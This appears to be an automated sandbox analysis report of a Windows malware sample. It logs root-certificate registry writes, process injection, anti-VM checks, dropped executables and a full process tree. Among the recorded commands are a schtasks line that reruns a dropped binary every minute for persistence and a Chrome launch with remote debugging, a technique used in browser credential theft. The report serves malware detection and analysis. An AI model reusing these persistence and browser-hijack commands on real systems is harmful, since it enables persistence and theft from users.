\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a ShellKernelBridge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 ShellKernelBridge.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 04000000010000001000000091de0625abdafd32170cbb25172a84670f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070301620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae4140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee419000000010000001000000063664b080559a094d10f0a3c5f4f629020000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f ShellKernelBridge.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 5c00000001000000040000000008000019000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e3620000000100000020000000c3846bf24b9e93ca64274c0ec67c1ecc5e024ffcacd2d74019350e81fe546ae409000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877604000000010000001000000091de0625abdafd32170cbb25172a846720000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f ShellKernelBridge.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 ShellKernelBridge.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4436 schtasks.exe 2124 schtasks.exe 3920 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4816 fbd20cabacee9b0def4ea7c0c7340405.exe 4816 fbd20cabacee9b0def4ea7c0c7340405.exe 3240 rapes.exe 3240 rapes.exe 2832 JqGBbm7.exe 2832 JqGBbm7.exe 3644 rapes.exe 3644 rapes.exe 3784 zY9sqWs.exe 3784 zY9sqWs.exe 3784 zY9sqWs.exe 3784 zY9sqWs.exe 3004 rapes.exe 3004 rapes.exe 2096 BXxKvLN.exe 2096 BXxKvLN.exe 2472 v6Oqdnc.exe 2472 v6Oqdnc.exe 1028 powershell.exe 1028 powershell.exe 1028 powershell.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 2096 BXxKvLN.exe 2096 BXxKvLN.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 2968 powershell.exe 2968 powershell.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 2968 powershell.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 2096 BXxKvLN.exe 2096 BXxKvLN.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
pid Process 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe -
Suspicious use of AdjustPrivilegeToken 44 IoCs
description pid Process Token: SeDebugPrivilege 1436 d0HNrLB.exe Token: SeDebugPrivilege 3276 d0HNrLB.exe Token: SeDebugPrivilege 2176 d0HNrLB.exe Token: SeDebugPrivilege 1752 d0HNrLB.exe Token: SeDebugPrivilege 1028 powershell.exe Token: SeLockMemoryPrivilege 748 YoQVP7DxS.bin Token: SeDebugPrivilege 2096 BXxKvLN.exe Token: SeDebugPrivilege 2968 powershell.exe Token: SeDebugPrivilege 3496 powershell.exe Token: SeDebugPrivilege 2572 powershell.exe Token: SeDebugPrivilege 2476 powershell.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeShutdownPrivilege 2028 chrome.exe Token: SeCreatePagefilePrivilege 2028 chrome.exe Token: SeDebugPrivilege 5472 powershell.exe Token: SeShutdownPrivilege 5152 powercfg.exe Token: SeCreatePagefilePrivilege 5152 powercfg.exe Token: SeShutdownPrivilege 5400 powercfg.exe Token: SeCreatePagefilePrivilege 5400 powercfg.exe Token: SeShutdownPrivilege 1188 powercfg.exe Token: SeCreatePagefilePrivilege 1188 powercfg.exe Token: SeShutdownPrivilege 5428 powercfg.exe Token: SeCreatePagefilePrivilege 5428 powercfg.exe Token: SeDebugPrivilege 5212 powershell.exe Token: SeShutdownPrivilege 5028 powercfg.exe Token: SeCreatePagefilePrivilege 5028 powercfg.exe Token: SeShutdownPrivilege 4180 powercfg.exe Token: SeCreatePagefilePrivilege 4180 powercfg.exe Token: SeShutdownPrivilege 5236 powercfg.exe Token: SeCreatePagefilePrivilege 5236 powercfg.exe Token: SeShutdownPrivilege 4812 powercfg.exe Token: SeCreatePagefilePrivilege 4812 powercfg.exe Token: SeLockMemoryPrivilege 1052 explorer.exe -
Suspicious use of FindShellTrayWindow 54 IoCs
pid Process 3148 45d3c59eed.exe 3148 45d3c59eed.exe 3148 45d3c59eed.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 2028 chrome.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe 1356 msedge.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 3148 45d3c59eed.exe 3148 45d3c59eed.exe 3148 45d3c59eed.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4816 wrote to memory of 3240 4816 fbd20cabacee9b0def4ea7c0c7340405.exe 89 PID 4816 wrote to memory of 3240 4816 fbd20cabacee9b0def4ea7c0c7340405.exe 89 PID 4816 wrote to memory of 3240 4816 fbd20cabacee9b0def4ea7c0c7340405.exe 89 PID 3240 wrote to memory of 2832 3240 rapes.exe 95 PID 3240 wrote to memory of 2832 3240 rapes.exe 95 PID 3240 wrote to memory of 2832 3240 rapes.exe 95 PID 3240 wrote to memory of 2080 3240 rapes.exe 98 PID 3240 wrote to memory of 2080 3240 rapes.exe 98 PID 2080 wrote to memory of 4700 2080 3Mv6i65.exe 99 PID 2080 wrote to memory of 4700 2080 3Mv6i65.exe 99 PID 3240 wrote to memory of 1588 3240 rapes.exe 103 PID 3240 wrote to memory of 1588 3240 rapes.exe 103 PID 3240 wrote to memory of 1588 3240 rapes.exe 103 PID 3240 wrote to memory of 3784 3240 rapes.exe 104 PID 3240 wrote to memory of 3784 3240 rapes.exe 104 PID 3240 wrote to memory of 3784 3240 rapes.exe 104 PID 3240 wrote to memory of 2240 3240 rapes.exe 105 PID 3240 wrote to memory of 2240 3240 rapes.exe 105 PID 3240 wrote to memory of 1436 3240 rapes.exe 106 PID 3240 wrote to memory of 1436 3240 rapes.exe 106 PID 3240 wrote to memory of 1436 3240 rapes.exe 106 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 1436 wrote to memory of 3276 1436 d0HNrLB.exe 107 PID 3276 wrote to memory of 4436 3276 d0HNrLB.exe 111 PID 3276 wrote to memory of 4436 3276 d0HNrLB.exe 111 PID 3276 wrote to memory of 4436 3276 d0HNrLB.exe 111 PID 3240 wrote to memory of 2764 3240 rapes.exe 113 PID 3240 wrote to memory of 2764 3240 rapes.exe 113 PID 3240 wrote to memory of 2764 3240 rapes.exe 113 PID 3240 wrote to memory of 2224 3240 rapes.exe 115 PID 3240 wrote to memory of 2224 3240 rapes.exe 115 PID 2224 wrote to memory of 3256 2224 7UlMpzX.exe 117 PID 2224 wrote to memory of 3256 2224 7UlMpzX.exe 117 PID 3256 wrote to memory of 1116 3256 Q8yTiDPzQaAiAnr5kv.exe 118 PID 3256 wrote to memory of 1116 3256 Q8yTiDPzQaAiAnr5kv.exe 118 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 2176 wrote to memory of 1752 2176 d0HNrLB.exe 120 PID 3240 wrote to memory of 2096 3240 rapes.exe 123 PID 3240 wrote to memory of 2096 3240 rapes.exe 123 PID 1116 wrote to memory of 1576 1116 VirtDXPlBjAIqu.iso 124 PID 1116 wrote to memory of 1576 1116 VirtDXPlBjAIqu.iso 124 PID 3240 wrote to memory of 2472 3240 rapes.exe 130 PID 3240 wrote to memory of 2472 3240 rapes.exe 130 PID 3240 wrote to memory of 2472 3240 rapes.exe 130 PID 1116 wrote to memory of 1188 1116 VirtDXPlBjAIqu.iso 133 PID 1116 wrote to memory of 1188 1116 VirtDXPlBjAIqu.iso 133 PID 3240 wrote to memory of 3148 3240 rapes.exe 136 PID 3240 wrote to memory of 3148 3240 rapes.exe 136 PID 3240 wrote to memory of 3148 3240 rapes.exe 136 PID 3148 wrote to memory of 2968 3148 45d3c59eed.exe 137 PID 3148 wrote to memory of 2968 3148 45d3c59eed.exe 137 PID 3148 wrote to memory of 2968 3148 45d3c59eed.exe 137 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\fbd20cabacee9b0def4ea7c0c7340405.exe"C:\Users\Admin\AppData\Local\Temp\fbd20cabacee9b0def4ea7c0c7340405.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4816 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4700
-
-
-
C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3784
-
-
C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4436
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1436 -s 8124⤵
- Program crash
PID:2300
-
-
-
C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:2764 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:808 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"5⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2028 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffedaeacc40,0x7ffedaeacc4c,0x7ffedaeacc586⤵PID:804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:26⤵PID:380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1804,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1924 /prefetch:36⤵PID:3356
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2288 /prefetch:86⤵PID:4180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:16⤵
- Uses browser remote debugging
PID:5148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3216,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3252 /prefetch:16⤵
- Uses browser remote debugging
PID:5160
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4260,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4536 /prefetch:16⤵
- Uses browser remote debugging
PID:5368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4280,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:86⤵PID:5472
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3652,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4764 /prefetch:86⤵PID:5480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4908,i,4532809505769044334,8083202195682478412,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4756 /prefetch:86⤵PID:6100
-
-
